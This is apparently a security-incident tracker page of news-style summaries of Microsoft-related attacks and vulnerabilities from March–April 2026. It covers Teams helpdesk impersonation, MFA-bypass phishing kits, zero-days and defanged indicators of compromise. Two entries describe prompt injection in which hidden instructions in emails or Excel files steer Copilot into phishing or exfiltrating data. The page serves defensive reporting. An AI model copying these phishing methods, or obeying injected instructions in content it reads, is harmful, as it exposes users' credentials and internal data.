UNC6692 Threat Group Exploits Microsoft Teams in Sophisticated Social Engineering Attack A newly identified cyber threat group, UNC6692, is targeting enterprises through a multi-stage attack combining social engineering and custom malware, leveraging Microsoft Teams and cloud services to evade detection. The attack begins with an email bombing campaign, flooding victims with spam to create confusion. While targets are distracted, attackers impersonate IT helpdesk staff via Microsoft Teams, using external accounts to offer a fake "local patch" as a solution. Victims are directed to a spoofed "Mailbox Repair Utility" page, where they are prompted to enter credentials intentionally rejected on the first attempt to ensure password capture before exfiltration to an attacker-controlled AWS server. Once credentials are stolen, the attack deploys a modular malware toolkit dubbed the SNOW ecosystem, including: - SNOWBELT: A malicious Chromium extension for persistent access. - SNOWGLAZE: A Python-based tunneling tool for encrypted communication. - SNOWBASIN: A remote access tool enabling command execution, screenshots, and data theft. After gaining a foothold, UNC6692 moves laterally across the network using Python scripts to scan systems, targeting backup servers and dumping LSASS memory to extract password hashes. These hashes are cracked offline and used in Pass-the-Hash attacks to compromise domain controllers. Attackers then exfiltrate the Active Directory database using legitimate forensic tools like FTK Imager, delivered via Microsoft Edge, and transfer data via platforms such as LimeWire. The campaign exemplifies "living off the cloud" tactics, abusing trusted services like Microsoft Teams and AWS to bypass traditional security measures. Indicators of compromise (IoCs) include: - Phishing/payload delivery: `service-page-25144-30466-outlook.s3.us-west-2.amazonaws[.]com` - SNOWBELT C2: `cloudfront-021.s3.us-west-2.amazonaws[.]com` - SNOWGLAZE WebSocket: `wss://sad4w7h913-b4a57f9c36eb.herokuapp[.]com/ws` - Data exfiltration: `service-page-11369-28315-outlook.s3.us-west-2.amazonaws[.]com` The attack underscores the risks of external Teams communications and the need for enhanced monitoring of browser-based activity and cloud service abuse.
INCIDENT DETAILS -
TYPE
Social Engineering, Malware, Credential Theft, Lateral Movement, Data Exfiltration
IMPACT
Data Compromised: Credentials, Active Directory Database, Password Hashes, Screenshots, System DataMicrosoft TeamsDomain ControllersBackup ServersUser WorkstationsOperational Impact: Lateral Movement, Unauthorized Access, Data ExfiltrationIdentity Theft Risk: High
DATA BREACH
CredentialsPassword HashesActive Directory DatabaseSystem DataSensitivity Of Data: HighData Exfiltration: YesData Encryption: No (data exfiltrated in plaintext or hashed form)Personally Identifiable Information: Likely (credentials, AD data)
APRIL 2026
274Before Incident
Vulnerability
20 Apr 2026Microsoft Security
Microsoft: Attackers Exploit Windows Zero-Days to Bypass Microsoft Defender

Zero-Day Windows Flaws Exploited in Targeted Attacks Following Leak

271After Incident
CRITICAL-3
MIC1776963128
Zero-Day Windows Flaws Exploited in Targeted Attacks Following Leak Security researchers at Huntress Labs have confirmed that three recently leaked Windows zero-day vulnerabilities BlueHammer, RedSun, and UnDefend are being actively exploited in real-world attacks. The flaws were publicly disclosed after a researcher released proof-of-concept exploit code, prompting threat actors to weaponize them before patches were fully available. The vulnerabilities target Microsoft Defender and can be chained to bypass security controls. BlueHammer and RedSun are local privilege-escalation flaws allowing attackers with limited access to gain system-level control, while UnDefend enables the disabling of Defender’s security updates. When combined, these exploits allow attackers to neutralize defenses, escalate privileges, and maintain persistence on compromised systems. Huntress observed manual, "hands-on-keyboard" attacks leveraging this exploit chain, indicating targeted intrusions rather than automated campaigns. While Microsoft released a patch for BlueHammer in its April 2026 Patch Tuesday update, RedSun and UnDefend remain unpatched, leaving millions of Windows systems exposed. Organizations are advised to apply available patches immediately, restrict local admin privileges, and monitor for suspicious activity such as attempts to disable Defender or unusual privilege escalation. The ongoing exploitation underscores the risks of unpatched zero-days in critical security components.
INCIDENT DETAILS -
TYPE
Zero-Day Exploitation
IMPACT
Systems Affected: Windows systems with Microsoft DefenderOperational Impact: Neutralized defenses, privilege escalation, persistence on compromised systems
APRIL 2026
291Before Incident
Cyber Attack
19 Apr 2026Microsoft Security
Microsoft: Exposed Server Unmasks Evilginx Operators Stealing Microsoft 365 Sessions and OAuth Tokens

Exposed Server Reveals Active MFA-Bypass Phishing Operation Linked to Egyptian Threat Actor

271After Incident
CRITICAL-20
MIC1783931313
Exposed Server Reveals Active MFA-Bypass Phishing Operation Linked to Egyptian Threat Actor A misconfigured server in Budapest inadvertently exposed an active phishing campaign designed to bypass Microsoft 365 multi-factor authentication (MFA) and maintain persistent access to compromised accounts. The server, hosted at 185.163.204[.]7, was running a publicly accessible Python HTTP server with directory listing enabled, revealing operational files including phishing configurations, Telegram session artifacts, credential logs, remote management (RMM) installers, and malicious droppers. The breach provided researchers with a detailed snapshot of the threat actor’s infrastructure, linked to an Egyptian operator tracked as codemado (also known as MaDoO and MaDosc). The actor’s online footprint dates back to at least 2018, with activity in hacking and VoIP-focused communities. Key findings include: - MFA-Bypass Techniques: The campaign used Evilginx-style reverse proxies under the domain picis[.]net to intercept authenticated session cookies and OAuth tokens in real time, allowing attackers to access cloud services even after victims completed MFA challenges. - Custom Tooling: The operator deployed MaDoO Blaster v4.7.3, a bulk mailer, alongside multiple Evilginx forks, including red-queen (linked to mail-argenta) and black-queen (associated with saroula01). Public GitHub repositories revealed phishing kits targeting Microsoft 365, Okta, GitHub, Gmail, and financial institutions, with some configurations setting cookie lifetimes to one year. - Anti-Bot Evasion: A Node.js gateway used browser fingerprinting to redirect scanners to benign sites (e.g., YouTube) while allowing targeted victims to reach Microsoft-themed lures (OneDrive, SharePoint, DocuSign). - Post-Compromise Tools: The server contained ScreenConnect, SimpleHelp, SuperOps, and XEOX RMM tools, alongside PowerShell and VBScript droppers, indicating the operator’s focus on remote access and persistence. Links to AsyncRAT activity further suggest broader malicious objectives. - Device Code Phishing: The black-queen framework abused Microsoft’s Device Code Flow, tricking victims into authenticating via legitimate Microsoft portals while attackers harvested tokens. This campaign reportedly compromised 218 victims across 12 countries, with automated token refresh maintaining silent access. The infrastructure also included a Cloudflare Tunnel, Telegram-based victim alerts, and compromised SMTP account-checking mechanisms. Hardcoded credentials in phishing panels and reused passwords tied to the operator were exposed in the breach. Indicators of Compromise (IoCs) include the phishing domain picis[.]net, hosting IP 185.163.204[.]7, and RMM servers like vinicious.picis[.]net. The findings highlight the growing sophistication of adversary-in-the-middle (AiTM) phishing, where attackers exploit session tokens to bypass MFA protections. The operation’s ties to the "The Quarry" phishing-as-a-service ecosystem suggest broader collaboration among threat actors.
INCIDENT DETAILS -
TYPE
Phishing
MOTIVATION
Persistent access to compromised accounts, financial gain, remote control of systems
IMPACT
Data Compromised: Authenticated session cookies, OAuth tokens, credentials, personally identifiable information (PII)Systems Affected: Microsoft 365, Okta, GitHub, Gmail, financial institutions, remote management tools (RMM)Operational Impact: Persistent unauthorized access to cloud services, remote control of compromised systemsIdentity Theft Risk: High (PII exposure, session token abuse)
DATA BREACH
Session cookiesOAuth tokensCredentialsPersonally Identifiable Information (PII)Number Of Records Exposed: 218 victims (records unspecified)Sensitivity Of Data: High (authenticated session tokens, PII)Data Exfiltration: Yes (via phishing and token interception)Personally Identifiable Information: Yes
APRIL 2026
291Before Incident
Vulnerability
09 Apr 2026Microsoft Security
Palo Alto Networks: Palo Alto Cortex Microsoft Teams Integration Vulnerability Enables Data Access for Attackers

Palo Alto Networks Patches Critical Flaw in Cortex XSOAR and XSIAM Microsoft Teams Integration

288After Incident
CRITICAL-3
PAL1775738158
Palo Alto Networks Patches Critical Flaw in Cortex XSOAR and XSIAM Microsoft Teams Integration Palo Alto Networks has released an urgent security update to address a high-severity vulnerability (CVE-2026-0234) in the Microsoft Teams integration for Cortex XSOAR and Cortex XSIAM. The flaw, classified as an "Improper Verification of Cryptographic Signature" (CWE-347), could allow unauthenticated attackers to bypass security controls and access or modify sensitive data. The vulnerability stems from the integration’s failure to properly validate cryptographic signatures, enabling attackers to forge authentication tokens. With no prior privileges or user interaction required, threat actors could remotely exploit the flaw to manipulate security playbooks, access confidential incident data, or disrupt defensive operations. The flaw carries a CVSS base score of 9.2, with an adjusted operational severity score of 7.2, reflecting its high potential impact despite requiring advanced technical expertise to exploit. Affected versions include Cortex XSOAR and XSIAM Microsoft Teams Marketplace integrations (1.5.0 through 1.5.51). Palo Alto Networks has confirmed no active exploitation in the wild but warns that no temporary mitigations exist patching to version 1.5.52 or later is the only remediation. The vulnerability was discovered by an external researcher identified as "quinn." Organizations using these platforms are advised to apply the update immediately to prevent potential breaches.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: Sensitive data access/modificationSystems Affected: Cortex XSOAR and XSIAM Microsoft Teams integrationsOperational Impact: Disruption of defensive operations
DATA BREACH
Type Of Data Compromised: Confidential incident data, security playbooksSensitivity Of Data: High
APRIL 2026
314Before Incident
Cyber Attack
01 Apr 2026Microsoft Security
Microsoft: FBI Warns of Kali365 Attacking Microsoft 365 Users to Steal Logins and Bypass MFA

FBI Warns of Kali365 Phishing-as-a-Service Platform Targeting Microsoft 365 Users

289After Incident
CRITICAL-25
MIC1779445479
FBI Warns of Kali365 Phishing-as-a-Service Platform Targeting Microsoft 365 Users The FBI has issued a cybersecurity alert about Kali365, a rapidly spreading phishing-as-a-service (PhaaS) platform that enables threat actors to steal OAuth access tokens and bypass multi-factor authentication (MFA) for Microsoft 365 accounts. First observed in April 2026, the platform is distributed via Telegram channels, allowing even low-skilled attackers to launch sophisticated phishing campaigns with minimal effort. Unlike traditional credential theft, Kali365 exploits Microsoft’s legitimate device code authentication flow to trick users into authorizing malicious access. Attackers send phishing emails often impersonating Microsoft or document-sharing services containing a device code and instructions. When victims enter the code on a legitimate Microsoft verification page, they unknowingly grant attackers OAuth tokens, enabling persistent access to Outlook, Teams, OneDrive, and other services without triggering MFA again. The platform’s built-in features lower the barrier for cybercriminals, including: - AI-generated phishing email templates - Automated campaign deployment tools - Real-time victim tracking dashboards - OAuth token capture mechanisms Once compromised, attackers can exfiltrate emails, access sensitive files, monitor Teams communications, and maintain long-term persistence using refresh tokens. Because the attack does not directly steal credentials, traditional security alerts may fail to detect it, increasing dwell time. The FBI and CISA recommend restricting device code flow authentication, implementing conditional access policies, and monitoring for unusual sign-in patterns. Organizations are advised to audit existing device code dependencies before applying restrictions and maintain emergency access accounts to prevent lockouts. Victims are encouraged to report incidents to the FBI’s Internet Crime Complaint Center (IC3), providing details such as phishing email samples, suspicious login activity, and unauthorized devices. The rise of Kali365 underscores a growing shift toward token-based attacks that evade conventional defenses.
INCIDENT DETAILS -
TYPE
Phishing
IMPACT
Data Compromised: Emails, sensitive files, Teams communicationsSystems Affected: Microsoft 365 (Outlook, Teams, OneDrive)Operational Impact: Long-term persistence via refresh tokens, unauthorized access to servicesIdentity Theft Risk: High (OAuth token theft enabling account takeover)
DATA BREACH
Type Of Data Compromised: OAuth access tokens, emails, sensitive files, Teams communicationsSensitivity Of Data: High (personally identifiable information, corporate communications, sensitive documents)Data Exfiltration: YesPersonally Identifiable Information: Yes
Cyber Attack
01 Apr 2026Microsoft Security
Microsoft: Attackers Abuse Microsoft Teams to Impersonate IT Support and Steal Corporate Access

Microsoft Teams Abused in Rising IT Support Impersonation Attacks as Phishing Shifts from Email

289After Incident
CRITICAL-25
MIC1784881900
Microsoft Teams Abused in Rising IT Support Impersonation Attacks as Phishing Shifts from Email Cybercriminals are increasingly exploiting Microsoft Teams to impersonate internal IT support, tricking employees into granting remote access or divulging corporate credentials. This shift comes as traditional email phishing particularly campaigns tied to the Tycoon2FA phishing-as-a-service (PhaaS) platform declines sharply following a March 2026 disruption that crippled its infrastructure. Microsoft’s Q2 2026 email threat data reveals a 92% drop in Tycoon2FA-linked phishing since late 2025, alongside a 41% decline in QR-code and CAPTCHA-gated attacks in May and June. However, the reduction in email-based threats has not translated to fewer social engineering attacks instead, attackers are migrating to collaboration platforms like Teams, where messages often bypass secure email gateways and exploit implicit trust in internal communications. ### Teams-Based Phishing and Vishing Surge Microsoft Threat Intelligence reports a tenfold increase in malicious Teams call attempts since mid-2025, with attackers timing calls during weekday business hours to blend in with legitimate IT activity. The most concerning tactic involves cross-tenant Teams chats, where adversaries pose as IT support or helpdesk staff, warning of imminent account lockouts or security incidents. Victims are urged to "verify" access or initiate a remote assistance session using tools like Quick Assist, allowing attackers to escalate privileges to domain admin within minutes and exfiltrate data under the guise of routine maintenance. Attackers are refining their approach by adopting generic or SaaS-style display names (e.g., "ClickFix Support") to evade keyword-based detections and heighten urgency over authenticity. Microsoft observed that voice phishing (vishing) attempts via Teams have surged, with weekly malicious call volumes nearing 10 times mid-2025 levels by the end of Q2 2026. ### Broader Phishing Trends and Multi-Stage Campaigns While Teams abuse rises, email-based phishing remains massive but increasingly optimized. Microsoft detected 7.6 billion email phishing threats in Q2 2026, primarily focused on credential harvesting rather than malware delivery. Notable campaigns include multi-stage AiTM (Adversary-in-the-Middle) attacks combining: - Nested EML files - Calendar invitations - Microsoft authentication redirects - OAuth token theft PDF attachments accounted for 24–31% of attacks, though their volume declined 41% in May and 4% in June. Meanwhile, the decline of Tycoon2FA forced off Cloudflare and onto .RU domains has left a gap in the phishing-as-a-service market, with no single replacement yet emerging. ### Large-Scale Campaign Targets U.S. Organizations Microsoft Defender Research identified a phishing campaign targeting 107,000 users across nearly 19,000 organizations, almost exclusively in the United States. The shift to Teams reflects attackers’ adaptation to saturated email defenses, leveraging a less monitored, high-trust channel for one-to-one lures and interactive voice calls. ### Indicators of Compromise (IOCs) Recent campaigns have used domains like: - 9i6pokerdepot[.]com (DKIM-signed sending domain) - t90141296286.p.clickup-attachments[.]com (hosting stage 2 BAT dropper) - pixeldrain[.]com/api/file/3v92oJiL (final payload delivery) Attackers also employed nested EML attachments (e.g., "Re: Teams Archive Recording for {{DATE2}}.eml") and batch files (e.g., Financial_report.bat) to deploy malware. ### Defensive Recommendations (Fact-Based) To counter Teams-based impersonation, security teams are advised to: - Tighten external access policies for collaboration platforms. - Restrict or harden remote-support tools like Quick Assist. - Enforce phishing-resistant MFA (e.g., FIDO2/WebAuthn security keys) for privileged roles. - Leverage Conditional Access policies for admin accounts. - Educate users on legitimate IT contact methods to verify support requests. Microsoft’s Defender SmartScreen, Safe Links/Safe Attachments, and automatic attack disruption features are positioned as controls to limit the impact of successful social engineering attempts.
INCIDENT DETAILS -
TYPE
PhishingVishingSocial EngineeringCredential Harvesting
MOTIVATION
Credential theftPrivilege escalationData exfiltrationFinancial gain
IMPACT
Corporate credentialsOAuth tokensPersonally identifiable information (PII)Microsoft TeamsEmail systemsRemote assistance toolsPrivilege escalation to domain adminData exfiltration under guise of routine maintenanceBrand Reputation Impact: Potential erosion of trust in internal communicationsIdentity Theft Risk: High (due to credential theft and PII exposure)
DATA BREACH
Corporate credentialsOAuth tokensPersonally identifiable information (PII)Sensitivity Of Data: High (credentials, PII, OAuth tokens)Data Exfiltration: Yes (under guise of routine maintenance)EMLPDFBATPersonally Identifiable Information: Yes
Vulnerability
01 Apr 2026Microsoft Security
Microsoft: Edge browser leaves passwords exposed in plain text, says researcher

Microsoft Edge Password Manager Flaw Exposes Credentials in Plain Text

289After Incident
CRITICAL-25
MIC1778012656
Microsoft Edge Password Manager Flaw Exposes Credentials in Plain Text A Norwegian security researcher, Tom Jøran Sønstebyseter Rønning, has uncovered a critical vulnerability in Microsoft Edge’s built-in Password Manager, where saved credentials remain exposed in plain text within the browser’s process memory even after the browser is closed and reopened. The issue affects all devices running Edge, particularly shared or enterprise machines, where unauthorized access could lead to credential theft. Rønning demonstrated that Edge decrypts all stored passwords at startup, keeping them in memory regardless of whether the user visits the associated sites. Unlike Google Chrome, which employs App Bound Encryption to secure browser data, Microsoft’s approach leaves passwords vulnerable to extraction with minimal technical effort. The researcher plans to release a tool on GitHub to verify the flaw, reinforcing concerns about its accessibility to attackers. Microsoft has dismissed the issue as "by design," a stance criticized by cybersecurity experts, including Beauceron Security CEO David Shipley. Shipley argued that Microsoft’s response reflects a lack of motivation to prioritize security in its free browser, contrasting it with competitors like Google, which have implemented stronger protections. The flaw effectively lowers the barrier for cybercriminals, particularly info-stealers, to exploit compromised systems. The discovery follows a pattern of Microsoft downplaying security concerns, with similar incidents where vulnerabilities were labeled as "working as intended." While Microsoft has not commented further, the issue underscores broader risks in browser-based password management, especially for organizations relying on Edge in enterprise environments. Other browsers, such as Chrome, do not exhibit the same vulnerability.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: User credentialsSystems Affected: Microsoft Edge browser on all devicesOperational Impact: Increased risk of credential theft on shared or enterprise machinesBrand Reputation Impact: Negative impact due to perceived security negligenceIdentity Theft Risk: High
DATA BREACH
Type Of Data Compromised: CredentialsSensitivity Of Data: High (plain text credentials)Data Encryption: No (plain text in memory)Personally Identifiable Information: Yes (stored credentials)
MARCH 2026
328Before Incident
Cyber Attack
25 Mar 2026Microsoft Security
Microsoft and Bubble: Bubble AI app builder abused to steal Microsoft account credentials

Cybercriminals Exploit Bubble’s No-Code Platform to Bypass Phishing Detection

312After Incident
CRITICAL-16
MICBUB1774470256
Cybercriminals Exploit Bubble’s No-Code Platform to Bypass Phishing Detection Threat actors are leveraging Bubble, a no-code app-building platform, to host malicious web apps that evade phishing detection in campaigns targeting Microsoft accounts. By abusing the platform’s legitimate infrastructure, attackers create apps that redirect users to fake Microsoft login portals often hidden behind Cloudflare checks to steal credentials for Microsoft 365 access. Security researchers at Kaspersky identified the tactic, noting that apps hosted on Bubble’s trusted bubble.io domain bypass email security filters. The malicious apps use complex JavaScript bundles and Shadow DOM structures, making them difficult for automated analysis tools to flag as threats. Even manual inspection is challenging, as the generated code appears as a "massive jumble" of legitimate-looking scripts. Once victims enter credentials on the fake login pages, attackers harvest them to access emails, calendars, and other sensitive data. The method’s stealth and scalability raise concerns that phishing-as-a-service (PhaaS) platforms may adopt it, integrating it into kits that already include 2FA bypasses, session cookie theft, and AI-generated phishing emails. Bubble has not yet responded to inquiries about potential anti-abuse measures. The abuse of no-code platforms marks a growing trend in evasion techniques, complicating detection for both automated systems and security teams.
INCIDENT DETAILS -
TYPE
Phishing
MOTIVATION
Credential theft for Microsoft 365 access
IMPACT
Data Compromised: Microsoft 365 credentials (emails, calendars, sensitive data)Systems Affected: Microsoft accounts, Microsoft 365 servicesIdentity Theft Risk: High
DATA BREACH
Type Of Data Compromised: Credentials (Microsoft 365)Sensitivity Of Data: High (emails, calendars, sensitive business data)Data Exfiltration: Yes (credentials harvested)Personally Identifiable Information: Yes (Microsoft account credentials)
MARCH 2026
331Before Incident
Vulnerability
23 Mar 2026Microsoft Security
Microsoft: Over 511,000 End-of-Life Microsoft IIS Servers Exposed Online

Over Half a Million Outdated Microsoft IIS Servers Expose Global Cybersecurity Risk

328After Incident
CRITICAL-3
MIC1774275848
Over Half a Million Outdated Microsoft IIS Servers Expose Global Cybersecurity Risk Security researchers at The Shadowserver Foundation have identified a critical security threat affecting over 511,000 internet-facing Microsoft Internet Information Services (IIS) servers running end-of-life (EOL) versions. Of these, 227,000 have surpassed Microsoft’s Extended Security Updates (ESU) program, leaving them completely unsupported and vulnerable to exploitation. The findings, revealed on March 23, 2026, highlight a widespread failure to update or decommission outdated systems. These servers, now in an End-of-Support (EOS) state, no longer receive security patches even for paid updates making them prime targets for cyberattacks. Threat actors frequently scan for such systems to exploit known vulnerabilities, deploy ransomware, or gain initial access to corporate networks. The majority of affected servers are concentrated in China and the United States, though the issue spans globally. To aid remediation, Shadowserver has updated its Vulnerable HTTP reporting system, tagging outdated servers as "eol-iis" (end-of-life) or "eos-iis" (end-of-support) to help organizations identify and prioritize high-risk assets. IIS servers often serve as front-facing web infrastructure, meaning a successful compromise could provide attackers with a direct pathway into internal systems. Government agencies, including CISA, have repeatedly warned against using unsupported software on internet-facing systems, as they are frequently exploited by initial access brokers who sell compromised access to other malicious actors. Shadowserver has made its scan data available to network operators and national CERTs, while its live dashboards offer real-time visibility into the distribution of vulnerable systems. Organizations are urged to identify, upgrade, or isolate outdated IIS instances to mitigate risks. The discovery underscores the ongoing challenge of legacy system management and the urgent need for improved asset visibility to reduce the global attack surface.
INCIDENT DETAILS -
TYPE
Vulnerability Exposure
IMPACT
Systems Affected: Over 511,000 internet-facing Microsoft IIS serversOperational Impact: Potential compromise of internal systems via front-facing web infrastructure
MARCH 2026
331Before Incident
Vulnerability
12 Mar 2026Microsoft Security
Microsoft: Microsoft Authenticator could leak login codes—update your app now

Microsoft Authenticator Vulnerability Exposes MFA Codes to Malicious Apps

328After Incident
CRITICAL-3
MIC1773318419
Microsoft Authenticator Vulnerability Exposes MFA Codes to Malicious Apps A critical vulnerability (CVE-2026-26123) in Microsoft Authenticator for iOS and Android could allow malicious apps on the same device to intercept one-time sign-in codes or authentication deep links. The flaw affects users relying on the app for multi-factor authentication (MFA), including those using BYOD (Bring Your Own Device) setups for corporate access. ### How the Exploit Works Microsoft Authenticator generates time-based one-time passwords (TOTP) and processes deep links specialized URIs that trigger app actions, such as logging into accounts. If a user installs a malicious app and accidentally selects it to handle an authentication link, the app could capture the one-time code or sign-in credentials, granting attackers access to the victim’s accounts. A successful exploit could enable attackers to: - Complete login flows for services trusting Microsoft Authenticator codes. - Access sensitive data, including emails, files, cloud apps, or corporate systems. - Pivot to additional accounts if they are also protected by Authenticator on the same device. ### Mitigation & Updates Microsoft has patched the vulnerability in current releases. Users should: - Update Microsoft Authenticator via the App Store (iOS) or Google Play Store (Android). - Avoid installing new apps that request handling of authentication links or QR-based sign-ins until the update is applied. - Verify the app handling authentication requests ensuring it is Microsoft Authenticator or another trusted application. - Use alternative MFA methods (e.g., password manager integrations or platform-specific solutions) if updates are delayed. The flaw underscores the risks of malicious app interactions on mobile devices, particularly in BYOD environments where corporate and personal data intersect.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: One-time sign-in codes, authentication deep links, sensitive data (emails, files, cloud apps, corporate systems)Systems Affected: Microsoft Authenticator (iOS and Android)Operational Impact: Potential unauthorized access to corporate and personal accountsBrand Reputation Impact: Risk of reputational damage due to MFA bypassIdentity Theft Risk: High
DATA BREACH
Type Of Data Compromised: One-time passwords (TOTP), authentication deep links, sign-in credentialsSensitivity Of Data: High (MFA-protected accounts)Data Exfiltration: Possible if malicious app captures and transmits dataPersonally Identifiable Information: Potential (if linked to user accounts)
MARCH 2026
356Before Incident
Cyber Attack
11 Mar 2026Microsoft Security
Stryker: Cork-based Stryker hit with cyber attack linked to Iranian-backed group

Stryker Hit by Destructive Cyberattack Linked to Iranian-Backed Group

328After Incident
CRITICAL-28
STR1773240573
Stryker Hit by Destructive Cyberattack Linked to Iranian-Backed Group A global medical technology firm, Stryker, suffered a devastating wiper cyberattack on Wednesday, suspected to be orchestrated by Handala Hack, a group with ties to the Iranian regime. The attack targeted the company’s Cork, Ireland headquarters, where up to 5,000 employees including 4,000 in Cork are based, crippling critical IT systems and manufacturing operations. The National Cyber Security Centre (NCSC) in Dublin is responding to the incident, which involved the permanent deletion of data from infected systems a hallmark of wiper attacks, typically politically motivated rather than financially driven. Devices connected to Stryker’s network, including employee phones with Outlook installed, were wiped, and login screens were defaced with the Handala logo, a symbol of Palestinian resistance. The attack has disrupted production of Stryker’s medical devices, with some manufacturing machines still operational but their long-term functionality uncertain. Staff were instructed to avoid connecting to the company’s network via any device, including mobile apps like Microsoft Teams and Outlook, while recovery efforts continue. Employees have been sent home, relying on WhatsApp groups for updates. Stryker, which operates six manufacturing sites and three innovation centers in Ireland, is one of the country’s largest medical tech employers. The company confirmed the incident in a staff memo, stating that security experts and law enforcement are involved in the response, emphasizing that sites and personnel remain safe while efforts focus on restoring systems. Handala Hack, linked to Iran’s cyber warfare campaigns, has recently targeted Israeli, Jordanian, and Saudi oil and gas facilities, as well as the Academy of the Hebrew Language, according to Israeli media. The Israeli National Cyber Directorate has warned of a surge in Iranian cyberattacks against civilian companies, suggesting Stryker may have been targeted due to its business ties with Israel. The attack underscores Iran’s expanding cyber-economic warfare, extending beyond regional conflicts to global operations. With Ireland serving as Stryker’s largest hub outside the U.S., the incident highlights the growing threat of state-backed cyber sabotage in critical industries.
INCIDENT DETAILS -
TYPE
Wiper Attack
MOTIVATION
Politically motivated (suspected state-backed cyber sabotage)
IMPACT
Data Compromised: Permanent deletion of data from infected systemsSystems Affected: IT systems, manufacturing operations, employee devices (Outlook, Microsoft Teams)Operational Impact: Disrupted production of medical devices, employees sent home, reliance on WhatsApp for updates
DATA BREACH
Type Of Data Compromised: System data (permanently deleted)
Vulnerability
11 Mar 2026Microsoft Security
Microsoft: Microsoft Copilot Email and Teams Summarization Vulnerability Enables Phishing Attacks

Microsoft 365 Copilot Vulnerability Exposes Users to Cross-Prompt Injection Attacks

328After Incident
CRITICAL-28
MIC1773325442
Microsoft 365 Copilot Vulnerability Exposes Users to Cross-Prompt Injection Attacks Researchers at Permiso Security uncovered a critical cross-prompt injection vulnerability (CVE-2026-26133) in Microsoft 365 Copilot’s email summarization feature, allowing attackers to manipulate AI-generated outputs for phishing and data exfiltration. The flaw, disclosed in January 2026, was patched by Microsoft between February and March 2026. The vulnerability exploits cross-prompt injection attacks (XPIA), where malicious instructions embedded in an email are treated as executable commands by Copilot’s large language model (LLM). Attackers craft emails containing hidden prompts that steer Copilot’s summaries to include attacker-controlled content such as fake security alerts without requiring traditional exploit methods like macros or attachments. The attack leverages trust transfer, where users inherently trust AI-generated summaries, bypassing skepticism typically applied to raw email content. Permiso’s testing revealed varying susceptibility across Copilot’s interfaces: - Outlook Summarize Button: Occasionally leaked injected commands when emails contained natural padding. - Outlook Copilot Pane: Generally cautious but still vulnerable under specific conditions. - Teams Copilot: Consistently produced attacker-shaped summaries, embedding malicious links or exfiltrating internal data (e.g., Teams messages, SharePoint files) via seemingly legitimate prompts. The flaw mirrors CVE-2025-32711 (EchoLeak), where hidden email prompts triggered Copilot to exfiltrate data via crafted image URLs, underscoring XPIA as a repeatable threat vector. Microsoft’s patch, fully deployed by March 11, 2026, mitigates the issue, but organizations were advised to restrict Copilot’s data access, enforce Purview sensitivity labels, and monitor activity logs for unusual retrieval patterns. The discovery highlights the security risks of integrating AI assistants into trusted workflows without robust boundary controls.
INCIDENT DETAILS -
TYPE
Cross-Prompt Injection Attack (XPIA)
MOTIVATION
PhishingData exfiltration
IMPACT
Data Compromised: Internal data (e.g., Teams messages, SharePoint files)Microsoft 365 CopilotOutlookTeamsOperational Impact: Potential unauthorized data access and exfiltration via AI-generated summariesBrand Reputation Impact: Risk of eroded user trust in AI-generated outputs
DATA BREACH
Internal communicationsSharePoint filesTeams messagesSensitivity Of Data: Potentially sensitive business data
Vulnerability
11 Mar 2026Microsoft Security
Microsoft: This 'fascinating' Microsoft Excel security flaw teams up spreadsheets and Copilot Agent to steal data

Microsoft Patches 83 Flaws in March 2026 Update, Including Zero-Click Excel AI Exploit

328After Incident
CRITICAL-28
MIC1773253470
Microsoft Patches 83 Flaws in March 2026 Update, Including Zero-Click Excel AI Exploit Microsoft’s March 2026 Patch Tuesday addressed 83 vulnerabilities, including a high-severity flaw in Excel (CVE-2026-26144) that enables zero-click data theft via AI-driven attacks. The bug, rated 7.5/10, combines cross-site scripting (XSS) with indirect prompt injection to exploit Microsoft’s Copilot assistant. The vulnerability stems from Excel’s failure to properly neutralize malicious input in web-generated content. Attackers could embed harmful links in Excel files, which execute when viewed in the preview pane without requiring the user to open the file. If Copilot is active, the AI could be tricked into exfiltrating sensitive data to an external server. While patching is the recommended fix, temporary mitigations include restricting outbound traffic from Office apps, monitoring Excel network requests, or disabling Copilot. Alongside this flaw, Microsoft resolved eight critical vulnerabilities among the 83 total fixes in this month’s update. The incident highlights the growing risks of AI integration in productivity tools.
INCIDENT DETAILS -
TYPE
Vulnerability
IMPACT
Data Compromised: Sensitive data exfiltrationSystems Affected: Microsoft Excel with Copilot integration
DATA BREACH
Type Of Data Compromised: Sensitive dataSensitivity Of Data: HighData Exfiltration: Yes
MARCH 2026
360Before Incident
Vulnerability
10 Mar 2026Microsoft Security
Microsoft: Critical Vulnerability in Microsoft Office Allows Malicious Code to Run Remotely

Microsoft Discloses Critical RCE Vulnerability in Office Suite (CVE-2026-26110)

331After Incident
CRITICAL-29
MIC1773239578
Microsoft Discloses Critical RCE Vulnerability in Office Suite (CVE-2026-26110) On March 10, 2026, Microsoft revealed a high-severity Remote Code Execution (RCE) vulnerability in its Office suite, tracked as CVE-2026-26110, with a CVSS score of 8.4. The flaw stems from a type confusion weakness (CWE-843), where Office misinterprets data types during processing, leading to memory corruption. Exploiting this vulnerability allows attackers to execute arbitrary code on a victim’s system without user interaction or elevated privileges, making it a prime target for cybercriminals. The attack vector is classified as local, meaning threat actors must first gain access to a system often via phishing, malicious downloads, or other initial access methods. Once exploited, the flaw grants full system control, enabling attackers to deploy ransomware, steal sensitive data, or pivot deeper into corporate networks. Microsoft has confirmed that while no active exploits have been observed in the wild, the public disclosure increases the risk of reverse-engineering by ransomware groups and state-sponsored actors. To mitigate the threat, Microsoft has released a patch, urging organizations to apply updates immediately through official channels, enable automatic updates, and deploy Endpoint Detection and Response (EDR) solutions to monitor suspicious Office processes. Restricting user privileges is also recommended to limit potential damage from secondary attack vectors. The vulnerability’s high impact on confidentiality, integrity, and availability underscores the urgency of remediation.
INCIDENT DETAILS -
TYPE
Remote Code Execution (RCE)
IMPACT
Systems Affected: Microsoft Office suiteOperational Impact: Full system control, potential for ransomware deployment, data theft, or lateral movement in corporate networks
MARCH 2026
375Before Incident
Cyber Attack
04 Mar 2026Microsoft Security
Rhysida and Microsoft: AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks

Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration

359After Incident
CRITICAL-16
CYBMIC1772619962
